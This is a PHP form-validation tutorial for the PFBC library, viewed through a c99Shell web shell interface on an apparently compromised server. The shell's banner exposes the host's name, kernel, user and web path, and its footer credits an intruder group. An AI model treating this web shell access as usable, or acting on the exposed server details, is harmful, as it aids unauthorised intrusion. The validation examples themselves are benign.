!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/examples/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)

Viewing file:     validation.php (14.89 KB)      -rw-r--r--

In PFBC, PHP validation is achieved in a two-step process. The first step is to apply validation rules to form elements via the element's validation property. Some elements, including Captcha, Color, Date, Email, jQueryUIDate, Month, Number, Url, and Week, have validation rules applied by default.

Secondly, you need to call the Form class' isValid static method once the form's data has been submitted. This function will return true/false. If false is returned, it indicates that one or more errors occurred. You will then need to redirect users back to the form to correct and resubmit. Here's an example of the isValid method.

    <?php
    // isValid() takes the form's identifier as its first argument.
    if(Form::isValid("")) {
        /* The form's submitted data has been validated. Your script can now
           proceed with any further processing required. */
    }
    else {
        /* Validation errors have been found. We now need to redirect back to the
           script where your form exists so the errors can be corrected and the
           form re-submitted. */
        header("Location: ");
    }
    ?>

PFBC supports 8 types of validation rules: AlphaNumeric, Captcha, Date, Email, Numeric, RegExp, Required, and Url. Here's how they are applied to elements.

    <?php
    use PFBC\Form;
    use PFBC\Element;
    use PFBC\Validation;
    // PFBC's Form.php must be included before this point.

    // Form identifier assumed to match the hidden "form" field below.
    $form = new Form("validation");
    $form->configure(array(
        "prevent" => array("bootstrap", "jQuery")
    ));
    $form->addElement(new Element\Hidden("form", "validation"));
    $form->addElement(new Element\Textbox("Require:", "Required", array(
        "required" => 1,
        "longDesc" => "The required property provides a shortcut for applying the Required class to the element's validation property. If supported, the HTML5 required attribute will also provide client-side validation."
    )));
    $form->addElement(new Element\Textbox("Regular Expression:", "RegularExpression", array(
        "validation" => new Validation\RegExp("/pfbc/", "Error: The %element% field must contain following keyword - \"pfbc\"."),
        "longDesc" => "The RegExp validation class provides the means to apply custom validation to an element. Its constructor includes two parameters: the regular expression pattern to test and the error message to display if the pattern is not matched."
    )));
    $form->addElement(new Element\Email("Email:", "Email", array(
        "longDesc" => "The Email element applies the Email validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element\Number("Numeric:", "Numeric", array(
        "longDesc" => "The Number element applies the Numeric validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element\Url("Url:", "Url", array(
        "longDesc" => "The Url element applies the Url validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element\Date("Date:", "Date", array(
        "longDesc" => "The Date element applies the RegExp validation rule by default - ensuring the following date format YYYY-MM-DD is adhered to."
    )));
    $form->addElement(new Element\jQueryUIDate("", "Date2", array(
        "longDesc" => "The jQueryUIDate element applies the Date validation rule by default - ensuring the submitted value satisfies PHP's DateTime class constructor."
    )));
    $form->addElement(new Element\Textbox("AlphaNumeric:", "AlphaNumberic", array(
        "validation" => new Validation\AlphaNumeric,
        "longDesc" => "The AlphaNumeric validation class will verify that the element's submitted value contains only letters, numbers, underscores, and/or hyphens."
    )));
    $form->addElement(new Element\Captcha("Captcha:", array(
        "longDesc" => "The Captcha element applies the Captcha validation, which uses reCaptcha's anti-bot service to reduce spam submissions."
    )));
    $form->addElement(new Element\Email("Multiple Rules:", "Email2", array(
        // The dot is escaped so that only a literal "@gmail.com" suffix matches;
        // an unescaped "." would also accept values such as "@gmailxcom".
        "validation" => new Validation\RegExp("/.*@gmail\.com$/", "Error: The %element% field must contain a Gmail address."),
        "longDesc" => "Multiple validation rules can be attached to an element by passing the validation property an array of validation class instances. This Email element also applies the RegExp validation rule to ensure the supplied email address is from Gmail."
    )));
    $form->addElement(new Element\Button);
    $form->addElement(new Element\Button("Cancel", "button", array(
        "onclick" => "history.go(-1);"
    )));
    $form->render();
    ?>
    <?php
    // The same form written with PFBC's underscore-style class names
    // (Element_*, Validation_*) instead of namespaces.
    // PFBC's Form.php must be included before this point.

    // Form identifier assumed to match the hidden "form" field below.
    $form = new Form("validation");
    $form->configure(array(
        "prevent" => array("bootstrap", "jQuery")
    ));
    $form->addElement(new Element_Hidden("form", "validation"));
    $form->addElement(new Element_Textbox("Require:", "Required", array(
        "required" => 1,
        "longDesc" => "The required property provides a shortcut for applying the Required class to the element's validation property. If supported, the HTML5 required attribute will also provide client-side validation."
    )));
    $form->addElement(new Element_Textbox("Regular Expression:", "RegularExpression", array(
        "validation" => new Validation_RegExp("/pfbc/", "Error: The %element% field must contain following keyword - \"pfbc\"."),
        "longDesc" => "The RegExp validation class provides the means to apply custom validation to an element. Its constructor includes two parameters: the regular expression pattern to test and the error message to display if the pattern is not matched."
    )));
    $form->addElement(new Element_Email("Email:", "Email", array(
        "longDesc" => "The Email element applies the Email validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element_Number("Numeric:", "Numeric", array(
        "longDesc" => "The Number element applies the Numeric validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element_Url("Url:", "Url", array(
        "longDesc" => "The Url element applies the Url validation rule by default. If supported, HTML5 validation will also be provided client-side."
    )));
    $form->addElement(new Element_Date("Date:", "Date", array(
        "longDesc" => "The Date element applies the RegExp validation rule by default - ensuring the following date format YYYY-MM-DD is adhered to."
    )));
    $form->addElement(new Element_jQueryUIDate("", "Date2", array(
        "longDesc" => "The jQueryUIDate element applies the Date validation rule by default - ensuring the submitted value satisfies PHP's DateTime class constructor."
    )));
    $form->addElement(new Element_Textbox("AlphaNumeric:", "AlphaNumberic", array(
        "validation" => new Validation_AlphaNumeric,
        "longDesc" => "The AlphaNumeric validation class will verify that the element's submitted value contains only letters, numbers, underscores, and/or hyphens."
    )));
    $form->addElement(new Element_Captcha("Captcha:", array(
        "longDesc" => "The Captcha element applies the Captcha validation, which uses reCaptcha's anti-bot service to reduce spam submissions."
    )));
    $form->addElement(new Element_Email("Multiple Rules:", "Email2", array(
        // The dot is escaped so that only a literal "@gmail.com" suffix matches;
        // an unescaped "." would also accept values such as "@gmailxcom".
        "validation" => new Validation_RegExp("/.*@gmail\.com$/", "Error: The %element% field must contain a Gmail address."),
        "longDesc" => "Multiple validation rules can be attached to an element by passing the validation property an array of validation class instances. This Email element also applies the RegExp validation rule to ensure the supplied email address is from Gmail."
    )));
    $form->addElement(new Element_Button);
    $form->addElement(new Element_Button("Cancel", "button", array(
        "onclick" => "history.go(-1);"
    )));
    $form->render();
    ?>

Custom Validation

Often, you'll find that you need to apply custom validation to your forms' submitted data. For instance, if you create a login form, you'll need to validate user-entered credentials against your system. PFBC has several methods that support this type of scenario. Let's take a look at an example implementation.

The isValid method has a second, optional parameter that controls whether or not the form's submitted data is cleared from the PHP session if the form validates without errors. In the example above, false is passed allowing us to authenticate the potential user with the fictional isValidUser function. If the user's credentials are valid, the session data is cleared manually with the clearValues method, and we redirect the user to their profile page. If invalid credentials were supplied, we use the setError method to manually set a custom error message and redirect back to the login form so the user can resubmit.
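
The login flow described above, written out as an added example; it is not code from the original page or from PFBC. The method names isValid, clearValues and setError are the ones the text mentions; passing the form identifier as their first argument, the form id "login", the field names, the two URLs, the include path and the body of isValidUser are assumptions made for illustration.

```php
<?php
// Added example (not PFBC's code). Assumed: form id "login", fields
// "Email"/"Password", login.php, profile.php, the PFBC include path, and
// the constructed one-user table inside isValidUser().
// password_hash()/password_verify() need PHP 5.5 or later.
use PFBC\Form;

session_start();
include("PFBC/Form.php");

function isValidUser($email, $password) {
    static $users = null, $dummy = null;
    if ($users === null) {
        // Constructed sample store: email => password_hash() output.
        $users = array(
            "alice@example.com" => password_hash("constructed-sample-pw", PASSWORD_DEFAULT),
        );
        // Hash checked for unknown accounts so both paths do similar work.
        $dummy = password_hash("no-such-account", PASSWORD_DEFAULT);
    }
    // Array-valued POST fields (Email[]=x) are rejected before use.
    if (!is_string($email) || !is_string($password)) {
        return false;
    }
    $known = isset($users[$email]);
    $ok = password_verify($password, $known ? $users[$email] : $dummy);
    return $known && $ok;
}

// false: keep the submitted values in the session until we decide below.
if (Form::isValid("login", false)) {
    $email = isset($_POST["Email"]) ? $_POST["Email"] : "";
    $password = isset($_POST["Password"]) ? $_POST["Password"] : "";
    if (isValidUser($email, $password)) {
        Form::clearValues("login");      // drop the stored form data
        session_regenerate_id(true);     // fresh session id after login
        header("Location: profile.php");
    } else {
        // One message for both a wrong email and a wrong password.
        Form::setError("login", "Error: Invalid Email Address / Password");
        header("Location: login.php");
    }
} else {
    header("Location: login.php");
}
exit; // stop here so nothing after a redirect runs
```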


--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--